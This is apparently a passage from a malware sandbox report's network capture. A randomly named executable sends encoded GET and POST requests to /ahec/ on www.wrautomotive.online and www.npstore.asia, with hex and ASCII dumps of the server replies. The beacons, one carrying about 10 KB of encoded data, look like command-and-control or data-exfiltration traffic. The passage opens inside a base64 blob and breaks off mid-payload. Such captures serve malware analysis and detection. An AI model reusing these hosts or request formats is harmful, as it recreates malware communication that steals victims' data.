FYhaYU+psTK304gxCsuilALa0CCloQOutGvE4UTp/2rKKoYbBzn5nGk6UreIglgsOQgRMdndF1ODRVqMbJ+d1W+fc+RkIp0zS2g2MeiGGIk4owkK6kAf4LUKCAu3TItwqzZ51ztLInp/HVGP9/FIcXY76UG8QQ3udFbRHjemTRb3Tbs3YcDqYuxo7+SKT2uC2O5utb8HKQ3x7L/KrTe5fTZW/IGwKDeOCOrmo9ifoxSbINpgJm8t0ss45adPB90nF7l74bq0wSCZfC8k7qav11fHWH7hEIgNKAJvFHHcKmqqgjhc2xd4P98fKufFFF3Cfb2X8vCtLbbjBoSz/IbqoikVQe2EzQbOjxNE4vN3FTs2aPvvZJ7h1w992laPOvf6+DlXjvDppaUamvPDHXKPQrVjYB3t1VD+Jh/HID4il1LF4OMjSroo+/uQWmbtPcPMytm24QwmEs+hZVcw9UZKqpvUCpP7x5smd8mWTvEaOfUIKAsUA16VfyrT0m3vto+bgmJhoSdsCFUkXTKvOK6lhv9MIDYfyZbme+vsSUvQ3S2AzR5MR6rYunM/BEXhfhATpFqLBv+I0MbdnsKPIx+1kEwH7Dx25wbwX1ugUp84cIAqe3TJk4d1gTUhNsbZNVMPj4hssogs04iSdldgyI3B3INJBFbFF3jDhRKU1PpjrUtNuN4L/6gPK16yFFiPGxQJmuBpo1lDTUsUtqo6gK6y4SeLxlzyQK2WNv810eXsB7y6xuTNn3w7PJWy0+qm+LJfNbNmOtVE3oQrDd6QLCjcdrIygPyWiOAfOls03u+OomycaQ0CSNokb3PuNgxS1MS44ttFpl4s92ykjxVHKY4hdHNYx3TrKWQS0Qq3qnz93ofKt/h0tpyvV8YiRvaDBRfZybH9bmhZ9mdbbSq1Lf7VtVclik5U32elqYHXLDCqsfSieC2u21HMHnsKBY6feXcGVpMBDPAvLbSgHJ3wvxZQpHUkJL/j8L1Dx7h1YQRQzZ3awzY3aQ3v0o3w02qo/pdQ2jPqSy354boh7TLYLEfnCUWKsLHQOffgdWzRWPAUZ+H17ZGErCdkLUq6SW9rKq/EMN04wDT6uBGb9qBXA3GAsFBtqfCgNS+fvZR6kbJmGussm6mFnGde2GG3L+Z4TwLlEUExha9z+qXotADrPQnFjO2wtGdrtMKSbwgLLya0QF6ZnhbZCpbHtUQW6qRJCWNMwyBpwM1+xIeNCvebir90ymsU1JQPEPHh42Wb4rgNZ9v24h8XDSRUYQAcb2aONwH0AImTKe4lngeHy4P+SncXcffeRzPGeQAqQ+G2A5ed976l2Oq0JdUiOz0Xo2HFnfKhKJGjaUU2nGsoo9bRWfLzA3QRJZePJhrOJ5zAmNN+bHhEU8XkDkzvabUv3rF6NOOcJiwHgX+x03yAVtPJlJCio+GlvmxPNsaWo+k0TDxfMzGsF5g5cOLoRa+ire7mMeB8qCJNUAMx8kMVPfocpkZOncDlk3XDX/7HSubgstGLZWekqUL4gZ8/A9qiMgaz9NdeIApH+hxRkZupfcT2o8uDe7OzILnBvbR3qB4/glGRto0fZJQCm9zm15jdEzmQg9TTCeBNP9TwMdaTW9K2bjiRVETVY9NE9jZv9b9svKmoetdPtfEHLqriviJ6/R7jIAejsKwtVNVJA8bob6N0WC9tjttE9TkW9NjQ/fL0wXhbeaUZvbAanh+9Ki+lZOyD6cyfrJrk0dwV0Lm1BxflqdeffqghQ5+Lv9OQ12lx/A0QjUT0v4DJ8mhst+ghWma2NoBrNX2Qc8FXUs14Z66QtubHxmJHoTT0A7eIO5FNL7xL2Hy4VDywP7APyiKnVO5sVfHGSKJ+Y35QshPxoRSSZ7bY9xBA+jiGPKniuWtSL1atTjXPGbvoE7mXCODeK
                                                                                                                                                            Dec 8, 2023 14:53:38.088500977 CET188INHTTP/1.0 403 Forbidden
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            52192.168.2.44979237.97.254.27805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:53:40.611998081 CET476OUTGET /ahec/?XveXHZvx=5igDJT3zPYxoznSfOhoK1Ng2m3hD5JqRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+25ITAAVo7msZgdw==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.wrautomotive.online
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852206945 CET1286INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Sep 2023 17:56:11 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                                            X-Varnish: 673959887 3
                                                                                                                                                            Age: 6897449
                                                                                                                                                            Via: 1.1 varnish (Varnish/6.1)
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Content-Length: 64668
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 61 73 63 69 69 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 53 6f 75 72 63 65 2b 53 61 6e 73 2b 50 72 6f 3a 34 30 30 2c 39 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 63 73 73 2f 63 6f 6d 62 69 6e 65 64 2d 6d 69 6e 2e 63 73 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 42 65 7a 65 74 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 36 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 6c 65 66 74 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
                                                                                                                                                            Dec 8, 2023 14:53:40.852233887 CET1286INData Raw: 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 69 70 2e 6e 6c 2f 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 6e 6c 22 20 72 65 6c 3d 22
                                                                                                                                                            Data Ascii: <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="
                                                                                                                                                            Dec 8, 2023 14:53:40.852252960 CET1286INData Raw: 32 2c 30 2d 33 2e 35 2c 30 2e 31 2d 34 2e 36 2c 30 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63
                                                                                                                                                            Data Ascii: 2,0-3.5,0.1-4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
                                                                                                                                                            Dec 8, 2023 14:53:40.852272034 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g>
                                                                                                                                                            Dec 8, 2023 14:53:40.852313042 CET1286INData Raw: 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 65 6e 20 68 69 64 64 65 6e 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65
                                                                                                                                                            Data Ascii: ved-nav-brand-link lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <pa
                                                                                                                                                            Dec 8, 2023 14:53:40.852364063 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63 30 2c 31 2e 32 2c 30 2e 32 2c 32 2e 31 30 32 2c 30 2e 39 2c 32 2e 38 30 31 63 30 2e 37 2c 30 2e 36 39 39 2c 31 2e 38 2c 31 2c
                                                                                                                                                            Data Ascii: c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo-p
                                                                                                                                                            Dec 8, 2023 14:53:40.852443933 CET1286INData Raw: 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 72
                                                                                                                                                            Data Ascii: <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g>
                                                                                                                                                            Dec 8, 2023 14:53:40.852509022 CET1286INData Raw: 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 73 77 69 74 63 68 4c 61 6e 67 75 61 67 65 28 27 6e 6c 27 29 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 66 6c 61 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: href="javascript:switchLanguage('nl')" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="http://www.w3.org/2000/svg" height="15" width="20" viewBox="0 0 640 480" version="1"><g fill-rule="evenodd" stroke-width="1
                                                                                                                                                            Dec 8, 2023 14:53:40.852539062 CET1286INData Raw: 68 31 30 32 2e 34 56 30 68 2d 31 30 32 2e 34 7a 4d 2d 32 35 36 20 35 31 32 2e 30 31 4c 38 35 2e 33 34 20 33 34 31 2e 33 34 68 37 36 2e 33 32 34 6c 2d 33 34 31 2e 33 34 20 31 37 30 2e 36 37 48 2d 32 35 36 7a 4d 2d 32 35 36 20 30 4c 38 35 2e 33 34
                                                                                                                                                            Data Ascii: h102.4V0h-102.4zM-256 512.01L85.34 341.34h76.324l-341.34 170.67H-256zM-256 0L85.34 170.67H9.016L-256 38.164V0zm606.356 170.67L691.696 0h76.324L426.68 170.67h-76.324zM768.02 512.01L426.68 341.34h76.324L768.02 473.848v38.162z" fill="#c00"/></g><
                                                                                                                                                            Dec 8, 2023 14:53:40.852638960 CET1286INData Raw: 32 35 2e 35 2d 35 37 2c 35 37 73 32 35 2e 35 2c 35 37 2c 35 37 2c 35 37 73 35 37 2d 32 35 2e 35 2c 35 37 2d 35 37 53 31 33 31 2e 34 2c 34 34 2c 39 39 2e 39 2c 34 34 7a 20 4d 31 33 33 2e 34 2c 31 34 31 2e 33 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: 25.5-57,57s25.5,57,57,57s57-25.5,57-57S131.4,44,99.9,44z M133.4,141.3 c-3.7-1.8-15.9-4.2-18.8-6.1c-3.4-2.1-2.3-13.7-2.3-13.7l2.3-2c0,0,0.6-5.2,1.6-7.1c2.2-4.3,4.6-11.4,4.6-11.4s2.3-1.7,2.3-4.
                                                                                                                                                            Dec 8, 2023 14:53:41.091236115 CET1286INData Raw: 20 20 20 20 20 20 6c 32 2e 35 2d 32 2e 35 63 30 2c 30 2c 30 2e 31 2c 30 2c 30 2e 31 2d 30 2e 31 63 30 2c 30 2c 30 2e 31 2d 30 2e 31 2c 30 2e 31 2d 30 2e 31 63 32 2e 39 2d 33 2c 33 2e 31 2d 37 2e 37 2c 30 2e 35 2d 31 30 2e 39 6c 30 2e 31 2c 30 63
                                                                                                                                                            Data Ascii: l2.5-2.5c0,0,0.1,0,0.1-0.1c0,0,0.1-0.1,0.1-0.1c2.9-3,3.1-7.7,0.5-10.9l0.1,0c-1.9-2.3-3.9-4.5-6-6.6c-2.2-2.2-4.4-4.2-6.8-6.2 l0,0c-2.9-2.4-7-2.4-10-0.3l-1.8,1.8l-1.7,1.7l-0.1-0.1c-3.6,3.6-8.8,4.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            53192.168.2.44979352.220.48.161805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:53:47.452611923 CET738OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.npstore.asia
                                                                                                                                                            Origin: http://www.npstore.asia
                                                                                                                                                            Referer: http://www.npstore.asia/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 70 4f 56 4f 61 49 44 38 37 38 67 41 45 65 64 4a 63 56 4a 55 52 74 6e 62 56 58 35 56 5a 6d 53 79 75 34 45 42 48 41 6c 2b 47 38 36 45 4f 6d 47 39 67 4c 6a 63 63 69 44 71 59 68 66 45 36 72 51 47 33 4d 67 75 48 51 30 33 4b 58 43 79 5a 66 45 4c 70 6f 6e 59 5a 59 41 34 2b 5a 52 39 67 36 4d 77 2b 4d 44 5a 65 75 4b 62 2b 36 39 46 70 46 37 4a 75 46 30 4b 32 45 4b 47 55 4b 55 57 6e 77 52 43 54 44 69 58 34 54 49 53 6b 43 44 30 37 62 33 4e 51 54 73 54 48 4a 53 65 48 6b 73 50 66 42 2f 63 63 65 73 42 36 67 35 74 78 47 39 54 2f 31 69 6e 7a 41 3d 3d
                                                                                                                                                            Data Ascii: XveXHZvx=pOVOaID878gAEedJcVJURtnbVX5VZmSyu4EBHAl+G86EOmG9gLjcciDqYhfE6rQG3MguHQ03KXCyZfELponYZYA4+ZR9g6Mw+MDZeuKb+69FpF7JuF0K2EKGUKUWnwRCTDiX4TISkCD07b3NQTsTHJSeHksPfB/ccesB6g5txG9T/1inzA==
                                                                                                                                                            Dec 8, 2023 14:53:47.872071981 CET363INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:47 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.npstore.asia/ahec/
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            54192.168.2.44979452.220.48.161805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:53:50.336647034 CET758OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.npstore.asia
                                                                                                                                                            Origin: http://www.npstore.asia
                                                                                                                                                            Referer: http://www.npstore.asia/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 70 4f 56 4f 61 49 44 38 37 38 67 41 46 2f 74 4a 61 45 4a 55 41 4e 6d 70 5a 33 35 56 54 47 53 32 75 34 59 42 48 43 4a 75 47 4b 4b 45 4e 45 4f 39 6a 4f 44 63 66 69 44 71 41 78 66 42 35 62 51 64 33 4d 73 4d 48 56 4d 33 4b 58 47 79 5a 64 63 4c 75 62 50 66 5a 49 41 6d 32 35 52 2f 6b 36 4d 77 2b 4d 44 5a 65 75 65 78 2b 36 6c 46 70 31 4c 4a 73 67 55 4e 38 6b 4b 42 64 71 55 57 78 77 52 47 54 44 6a 34 34 57 70 48 6b 45 48 30 37 62 6e 4e 51 41 30 4d 4e 4a 53 59 59 30 74 66 51 54 44 51 59 65 74 65 30 52 74 54 75 53 5a 44 2b 67 4f 30 30 37 34 71 4b 51 4a 67 68 56 4f 39 65 55 65 56 47 75 39 76 50 4c 4d 3d
                                                                                                                                                            Data Ascii: XveXHZvx=pOVOaID878gAF/tJaEJUANmpZ35VTGS2u4YBHCJuGKKENEO9jODcfiDqAxfB5bQd3MsMHVM3KXGyZdcLubPfZIAm25R/k6Mw+MDZeuex+6lFp1LJsgUN8kKBdqUWxwRGTDj44WpHkEH07bnNQA0MNJSYY0tfQTDQYete0RtTuSZD+gO0074qKQJghVO9eUeVGu9vPLM=
                                                                                                                                                            Dec 8, 2023 14:53:50.694278002 CET363INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:50 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.npstore.asia/ahec/
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            55192.168.2.44979552.220.48.161805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:53:53.437545061 CET10840OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.npstore.asia
                                                                                                                                                            Origin: http://www.npstore.asia
                                                                                                                                                            Referer: http://www.npstore.asia/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 70 4f 56 4f 61 49 44 38 37 38 67 41 46 2f 74 4a 61 45 4a 55 41 4e 6d 70 5a 33 35 56 54 47 53 32 75 34 59 42 48 43 4a 75 47 4a 71 45 4e 33 57 39 68 6f 4c 63 65 69 44 71 65 68 66 41 35 62 52 46 33 4d 45 49 48 56 49 6e 4b 53 61 79 59 2b 55 4c 72 71 50 66 53 49 41 6d 36 5a 52 38 67 36 4d 66 2b 49 66 64 65 75 4f 78 2b 36 6c 46 70 7a 6e 4a 2f 56 30 4e 7a 45 4b 47 55 4b 55 53 6e 77 52 69 54 44 36 50 34 57 64 58 6b 30 6e 30 69 36 58 4e 44 43 73 4d 50 70 53 61 5a 30 73 61 51 54 4f 4f 59 65 78 53 30 52 5a 71 75 51 46 44 38 78 4c 6a 6f 61 41 75 59 31 46 5a 32 30 71 51 61 55 33 39 54 2f 6c 73 4d 73 34 77 30 44 6e 63 59 31 50 61 50 5a 61 5a 30 6b 35 4e 7a 57 51 4e 44 54 61 47 56 54 50 4e 62 4d 4e 73 42 4a 34 50 42 56 45 4a 65 79 47 35 75 58 54 55 69 49 6e 4b 6c 34 59 36 65 34 39 79 57 71 47 4f 65 41 30 71 37 64 2f 42 51 48 44 5a 66 63 4c 71 56 38 61 49 6a 31 4e 31 65 71 61 68 6f 46 4b 66 51 31 4f 33 38 6e 4b 78 38 66 78 34 70 70 73 6c 58 72 5a 58 42 5a 68 72 4d 59 32 59 63 46 66 35 64 69 66 58 2b 48 42 6b 6f 5a 53 44 63 68 6e 76 77 41 37 69 65 76 52 47 73 37 59 65 37 4e 44 63 71 68 72 6e 57 33 73 2f 66 39 77 56 61 65 48 69 4f 2f 35 6a 6b 47 4d 77 36 46 4b 45 7a 6a 34 62 71 79 67 39 4d 79 44 44 69 64 2b 68 30 4c 66 44 72 67 34 41 46 6b 31 73 46 76 67 66 6a 38 2b 75 6d 42 71 30 41 4f 38 6e 5a 72 6f 36 66 38 44 32 33 44 59 78 4e 33 36 75 42 4d 52 44 71 53 46 38 79 37 6d 38 70 6f 56 71 4e 44 6e 41 67 69 5a 